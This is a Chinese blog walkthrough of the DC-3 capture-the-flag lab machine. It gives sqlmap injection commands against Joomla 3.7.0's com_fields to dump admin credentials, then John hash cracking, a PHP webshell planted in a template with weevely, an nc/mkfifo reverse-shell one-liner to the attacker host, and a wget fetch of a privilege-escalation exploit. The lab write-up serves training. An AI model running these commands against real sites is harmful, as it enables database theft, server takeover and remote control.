DC-3WP

明确目标

找出靶机的最终flag

信息收集

查找出靶机IP地址,利用nmap或者arp -scan -l扫描存活主机

 

漏洞探测

  1. 利用nmap查看靶机相关信息,nmap -A -p- 192.168.221.132 (-A是激进扫描,实战中慎用!-p-是快速扫描全部端口信息)


    发现joomla 内容管理系统(Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统)
  2. 这里发现端口开放,80(http服务)
  3. 尝试访问http服务 

 

漏洞利用

  1. 现在针对这个内容管理系统下手,使用针对于这类cms的扫描工具,发现版本为3.7.0,还有一个管理员页面

  2. 使用漏洞查找工具,查找当前版本的漏洞

    找一下该利用脚本的位置


    利用代码,使用sqlmap
  3. sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
    查询存在那些数据库
  4. 查看一下当前数据库 -current-db 为joomladb
  5. 查询当前数据库下面的表有哪些
    sqlmap -u "http://192.168.221.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
  6. 查询users表下面有哪些字段
    sqlmap -u "http://192.168.221.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

  7. 查询name,password的数据
    sqlmap -u "http://192.168.221.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump  -p list[fullordering]

  8. 发现admin密码为$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,不知道是什么密文,用john破解一下,把密码文件放在txt文件里面,john xx.txt ,如果想查看破解过的密码可以加上 --show

  9. 用该密码来登录admin后台

    翻看内容找到模板templates
  10. 找到网站默认页面文件index.php插入一句话木马(提前验证代码是否可以被执行)
  11. 用weevely连接

  12. 反弹shell,获取更大的权限,攻击端监听一个端口,nc -lvp 6666
    shell 界面执行 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.221.129 6666 >/tmp/f

  13. 权限不够,提权,查找searchsploit Linux 4.4 Ubuntu 16

  14. 发现拒绝服务漏洞,查找漏洞地址 searchsploit -p 39772.txt


    查看漏洞说明,下载exp文件

    连接不上
  15. 下载过后到靶机执行,无法访问国外网站的话可以其他地方下载到kali,然后使用kali建立一个apache2服务,把下载的zip文件放在var/www/html下面,靶机wget http://192.168.221.129/39772.zip 然后解压执行./

总结

  1. 信息收集很重要,要对渗透的靶机做全面的信息收集,这里就发现了网站使用的cms,从这一突破口下手查找针对该cms的漏洞,熟练使用针对与各类cms的漏洞检测工具joomscan、wpscan等
  2. 学会使用kali searchsploit 去寻找历史漏洞
  3. sqlmap的使用
  4. 使用John去爆破密码
  5. Weevely 的使用 weevely generate 1234 webshell.php 生成木马文件
  6. 反弹shell(通常用于被控端因防火墙受限、权限不足、端口被占用等情形,让被控端主动连接攻击端,把命令行输入输出到攻击端)
  7. 使用工具查找对应系统版本漏洞提权
  8. 要多转变思路!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值